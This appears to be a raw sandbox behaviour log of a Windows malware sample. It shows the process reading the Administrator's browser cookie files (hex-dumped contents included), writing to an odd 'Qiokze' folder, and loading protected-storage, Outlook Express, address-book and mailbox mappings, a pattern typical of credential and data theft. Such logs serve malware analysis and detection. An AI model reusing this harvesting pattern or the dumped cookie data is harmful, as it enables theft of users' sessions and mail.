C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt none 100 4D 55 49 44 0A 32 34 30 44 42 43 38 44 38 34 42 30 36 38 42 35 33 37 45 44 42 44 37 36 38 30 42 30 36 38 30 42 0A 6C 69 76 65 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 32 30 34 38 33 32 37 36 38 0A 33 30 38 35 39 32 31 37 0A 32 35 34 31 33 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 64 34 62 32 32 37 62 34 35 61 38 36 34 61 63 39 38 65 33 36 61 39 34 63 64 61 39 64 64 36 35 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 34 30 34 34 37 31 34 39 32 38 0A 33 30 31 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 62 30 37 65 34 37 39 62 30 37 66 36 34 65 62 30 39 66 62 62 65 64 36 66 38 66 62 31 36 66 64 33 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 35 34 31 38 34 31 36 30 30 0A 33 30 31 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt none 108 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 39 35 61 30 63 63 36 61 31 63 39 38 34 39 64 33 61 65 30 32 31 35 37 34 31 33 62 35 38 65 36 61 0A 6D 69 63 72 6F 73 6F 66 74 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 37 39 39 39 37 33 38 38 38 0A 33 30 39 31 34 38 37 32 0A 32 31 37 31 30 34 34 37 35 32 0A 33 30 31 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt none 455 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 36 64 61 34 34 66 64 61 33 33 65 61 34 61 32 39 38 34 65 66 64 30 66 33 34 66 32 30 38 34 35 35 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 34 30 34 39 35 36 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt none 387 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 34 64 33 30 63 39 34 63 62 30 62 35 34 62 31 35 62 36 30 65 35 39 37 38 33 62 35 32 32 64 38 62 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 35 35 37 34 36 31 36 30 30 0A 33 30 31 34 34 31 35 30 0A 2A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt none 457 4D 43 31 0A 56 3D 33 26 47 55 49 44 3D 38 35 62 63 63 31 63 34 31 37 65 31 34 34 63 62 61 33 61 62 39 62 65 65 62 61 36 62 62 35 32 32 0A 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 31 33 30 38 32 34 31 39 32 0A 33 30 39 31 34 38 39 38 0A 32 32 31 34 37 39 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt none 690 46 43 30 30 0A 46 42 3D 0A 72 61 64 2E 6D 73 6E 2E 63 6F 6D 2F 0A 39 32 31 36 0A 33 38 30 32 31 31 32 30 30 30 0A 33 30 32 39 39 38 37 35 0A 32 33 39 33 38 35 34 37 35 32 0A 33 30 31 35 33 30 33 38 0A 2A 0A 46 43 30 31 0A 46 42 3D 0A 72 61 64 2E 6D 73 6E 2E 63 6F 6D 2F 0A 39 32 31 36 0A 33 38 30 32 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt none 115 55 49 44 0A 32 39 30 36 32 66 37 32 2D 39 35 2E 31 30 30 2E 32 34 39 2E 31 33 30 2D 31 33 30 32 33 34 30 35 30 36 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 34 30 31 38 39 36 37 30 34 0A 33 30 32 39 31 30 30 31 0A 32 36 36 30 35 39 31 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt none 113 55 49 44 0A 31 61 37 62 62 64 63 38 2D 32 31 32 2E 32 34 33 2E 31 35 32 2E 31 36 30 2D 31 33 30 32 32 37 39 32 33 30 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 37 37 32 35 32 37 33 36 0A 33 30 32 39 30 38 35 39 0A 33 32 37 37 31 37 36 33 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt none 112 55 49 44 0A 62 39 32 34 35 38 31 2D 36 35 2E 31 39 39 2E 36 33 2E 32 35 2D 31 33 30 36 31 35 38 37 34 37 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 32 33 32 37 36 36 30 38 30 0A 33 30 32 39 39 38 39 35 0A 32 30 30 31 34 38 35 35 36 38 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt none 90 69 30 30 0A 37 35 34 39 34 64 39 66 33 34 33 64 32 64 62 36 30 30 30 31 0A 77 65 6D 66 62 6F 78 2E 63 68 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 38 31 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 38 30 36 35 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt none 111 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 34 45 46 44 37 36 44 38 33 37 43 33 34 42 31 43 39 37 44 44 42 30 38 41 36 44 46 37 30 44 45 43 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 35 33 36 0A 33 38 35 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 39 38 31 35 34 39 32 38 0A success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt none 117 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 42 42 35 44 31 42 30 35 36 35 30 34 34 41 45 43 42 37 45 44 41 35 35 38 37 30 44 39 39 38 39 34 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 35 success or wait 1 1F8AEF0
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp none 5 05 0D 8C 79 C9 end of file 1 1F8BD68
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei PositionInformation Offset: 0 success or wait 5 1F8AF59
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt BasicInformation 00000000000000000000000000000000000000000000000000000000000000008000000000000000 success or wait 1 1F8AFC7
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
none query and write and read commit 1820000 12288 own pid read write success or wait 1
none query and write and read commit 1820000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 29D0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 29D0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown 71A50000 258048 own pid read write object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 1820000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 1820000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
none query and write and read commit 1820000 12288 own pid read write success or wait 1
none query and write and read commit 19E0000 12288 own pid read write success or wait 1
\KnownDlls\RASAPI32.dll write and read and execute unknown 19E0000 12288 own pid read write object name not found 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown 76EE0000 245760 own pid read write object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown 76E90000 73728 own pid read write object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit 2A50000 184320 own pid readonly success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown 2A50000 184320 own pid readonly object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown 71E50000 86016 own pid read write object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown 78080000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown 722B0000 20480 own pid read write object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown 19D0000 4096 own pid readonly success or wait 1
\KnownDlls\digest.dll write and read and execute unknown 19D0000 4096 own pid readonly object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown 75B00000 86016 own pid read write object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown 747B0000 290816 own pid read write object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
none query and write and read commit 2AD0000 12288 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown 2AD0000 12288 own pid read write object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit 2A90000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit 2A90000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
\KnownDlls\cryptdll.dll write and read and execute unknown 77C70000 151552 own pid read write object name not found 1
C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_IETldCache_index.dat_262144 write unknown 76790000 49152 own pid read write object name not found 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_IETldCache_index.dat_262144 query and write and read commit 2A90000 262144 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown 2A90000 262144 own pid read write object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
none query and write and read commit 2B10000 12288 own pid read write success or wait 1
none query and write and read commit 2B50000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B50000 208896 own pid readonly success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B50000 208896 own pid readonly success or wait 1
\KnownDlls\rsaenh.dll write and read and execute unknown 2B50000 208896 own pid readonly object name not found 1
C:\WINDOWS\system32\rsaenh.dll query and write and read and execute image 68000000 221184 own pid read write success or wait 1
C:\WINDOWS\system32\rsaenh.dll query and read commit 2B50000 208896 own pid readonly success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit 2B50000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit 2B50000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll query and write and read and execute image 68810000 270336 own pid read write success or wait 1
\KnownDlls\MSOERT2.dll write and read and execute unknown 68810000 270336 own pid read write object name not found 1
C:\WINDOWS\system32\msoert2.dll query and write and read and execute image 76880000 139264 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 2B60000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 2B60000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 2B60000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 2B80000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 2B80000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 2B80000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit 2B80000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit 2B80000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll query and write and read and execute image 71780000 73728 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 2BA0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 2BA0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll query and write and read and execute image 470D0000 528384 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 2BA0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 2BA0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll query and write and read and execute image 35F40000 258048 own pid read write success or wait 1
none query and write and read commit 2B80000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\msident.dll write and read and execute commit 2B80000 53248 own pid execute success or wait 1
C:\WINDOWS\system32\msident.dll write and read and execute commit 2B80000 53248 own pid execute success or wait 1
C:\WINDOWS\system32\msident.dll query and write and read and execute image 608A0000 61440 own pid read write success or wait 1
C:\WINDOWS\system32\msident.dll read commit 2B80000 53248 own pid readonly success or wait 1
C:\WINDOWS\system32\msidntld.dll write and read and execute commit 2B80000 16384 own pid execute success or wait 1
C:\WINDOWS\system32\msidntld.dll write and read and execute commit 2B80000 16384 own pid execute success or wait 1
C:\WINDOWS\system32\msidntld.dll query and write and read and execute image 60890000 24576 own pid read write success or wait 1
none query and write and read commit 2BE0000 12288 own pid read write success or wait 1
\KnownDlls\PSTOREC.DLL write and read and execute unknown 2BE0000 12288 own pid read write object name not found 1
C:\WINDOWS\system32\pstorec.dll query and write and read and execute image 5E0C0000 53248 own pid read write success or wait 1
C:\Program Files\Outlook Express\msoe.dll write and read and execute commit 2C70000 1318912 own pid execute success or wait 1
C:\Program Files\Outlook Express\msoe.dll write and read and execute commit 2C70000 1318912 own pid execute success or wait 1
C:\Program Files\Outlook Express\msoe.dll query and write and read and execute image 60330000 1347584 own pid read write success or wait 1
\KnownDlls\INETCOMM.dll write and read and execute unknown 60330000 1347584 own pid read write object name not found 1
C:\WINDOWS\system32\inetcomm.dll query and write and read and execute image 76150000 712704 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 2BE0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 2BE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 2BE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\inetres.dll write and read and execute commit 2BF0000 49152 own pid execute success or wait 1
C:\WINDOWS\system32\inetres.dll write and read and execute commit 2BE0000 49152 own pid execute success or wait 1
C:\WINDOWS\system32\inetres.dll query and write and read and execute image 2BF0000 57344 own pid read write conflicting addresses 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 2C70000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 2C70000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 2C70000 4096 own pid readonly success or wait 1
C:\Program Files\Outlook Express\msoeres.dll write and read and execute commit 2C90000 2482176 own pid execute success or wait 1
C:\Program Files\Outlook Express\msoeres.dll write and read and execute commit 2C90000 2482176 own pid execute success or wait 1
C:\Program Files\Outlook Express\msoeres.dll query and write and read and execute image 2C90000 2486272 own pid read write conflicting addresses 1
C:\Program Files\Common Files\System\directdb.dll write and read and execute commit 2EF0000 90112 own pid execute success or wait 1
C:\Program Files\Common Files\System\directdb.dll write and read and execute commit 2EF0000 90112 own pid execute success or wait 1
C:\Program Files\Common Files\System\directdb.dll query and write and read and execute image 6CDF0000 102400 own pid read write success or wait 1
\BaseNamedObjects\microsoft_thor_folder_notifyinfo_mappedfile query and write and read commit 2C70000 4096 own pid read write success or wait 1
none query and write and read commit 2F30000 12288 own pid read write success or wait 1
\NLS\NlsSectionCP20127 read unknown 2F30000 69632 own pid readonly success or wait 1
none query and write and read commit 2FC0000 12288 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbshare query and write and read and execute and extend size unknown 2FC0000 12288 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbshare query and write and read commit 2FC0000 28672 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap query and write and read and execute and extend size unknown 2FC0000 28672 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap query and write and read commit 2FD0000 12288 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap query and write and read and execute and extend size unknown 2FD0000 12288 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_folders.dbx_directdbfilemap query and write and read commit 2FE0000 77824 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbshare query and write and read and execute and extend size unknown 2FE0000 77824 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbshare query and write and read commit 3010000 28672 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read and execute and extend size unknown 3010000 28672 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read commit 3020000 12288 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read and execute and extend size unknown 3020000 12288 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read commit 3030000 77824 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 3050000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit 3050000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll query and write and read and execute image 470D0000 528384 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 3050000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit 3050000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll query and write and read and execute image 35F40000 258048 own pid read write success or wait 1
none query and write and read commit 30D0000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\mshtml.dll write and read and execute commit 30F0000 5963776 own pid execute success or wait 1
C:\WINDOWS\system32\mshtml.dll write and read and execute commit 30F0000 5963776 own pid execute success or wait 1
C:\WINDOWS\system32\mshtml.dll query and write and read and execute image 3CEA0000 5976064 own pid read write success or wait 1
\KnownDlls\msls31.dll write and read and execute unknown 3CEA0000 5976064 own pid read write object name not found 1
C:\WINDOWS\system32\msls31.dll query and write and read and execute image 30F0000 167936 own pid read write conflicting addresses 1
\BaseNamedObjects\#MSHTML#PERF#00000664 write unknown 30F0000 167936 own pid read write object name not found 1
none query and write and read commit 3160000 12288 own pid read write success or wait 1
none query and write and read commit 31A0000 12288 own pid read write success or wait 1
none query and write and read commit 31E0000 12288 own pid read write success or wait 1
none query and write and read commit 3220000 12288 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL write and read and execute commit 3220000 7569408 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL query and read commit 3220000 7569408 own pid readonly success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL write and read and execute commit 3220000 7569408 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\OUTLLIB.DLL query and read commit 3220000 7569408 own pid readonly success or wait 1
\BaseNamedObjects\Local\!PrivacIE!SharedMem!Counter query and write and read commit 3220000 4096 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3120000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3120000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3120000 4096 own pid readonly success or wait 1
\KnownDlls\PSAPI.DLL write and read and execute unknown 3120000 4096 own pid readonly object name not found 1
C:\WINDOWS\system32\psapi.dll query and write and read and execute image 76BF0000 45056 own pid read write success or wait 1
\NLS\NlsSectionCP28591 read unknown 76BF0000 45056 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read and execute and extend size unknown 76BF0000 45056 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_inbox.dbx_directdbfilemap query and write and read commit 3160000 143360 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbshare query and write and read and execute and extend size unknown 3160000 143360 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbshare query and write and read commit 3010000 28672 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbfilemap query and write and read and execute and extend size unknown 3010000 28672 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_offline.dbx_directdbfilemap query and write and read commit 3020000 12288 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbshare query and write and read and execute and extend size unknown 3020000 12288 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbshare query and write and read commit 3040000 28672 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap query and write and read and execute and extend size unknown 3040000 28672 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap query and write and read commit 30D0000 12288 own pid read write success or wait 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap query and write and read and execute and extend size unknown 30D0000 12288 own pid read write object name not found 1
\BaseNamedObjects\c:_documents and settings_administrator_local settings_application data_identities_{5223274d-42a6-41c5-9e78-3a6606a65e5e}_microsoft_outlook express_sent items.dbx_directdbfilemap query and write and read commit 3120000 77824 own pid read write success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\MPS56.tmp query and write and read and execute and extend size commit 2EF0000 180224 own pid readonly success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
none query and write and read commit 2850000 16384 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 2850000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit 2850000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\MPRAPI.dll write and read and execute unknown 76FB0000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\mprapi.dll query and write and read and execute image 76D40000 98304 own pid read write success or wait 1
\KnownDlls\ACTIVEDS.dll write and read and execute unknown 76D40000 98304 own pid read write object name not found 1
C:\WINDOWS\system32\activeds.dll query and write and read and execute image 77CC0000 204800 own pid read write success or wait 1
\KnownDlls\adsldpc.dll write and read and execute unknown 77CC0000 204800 own pid read write object name not found 1
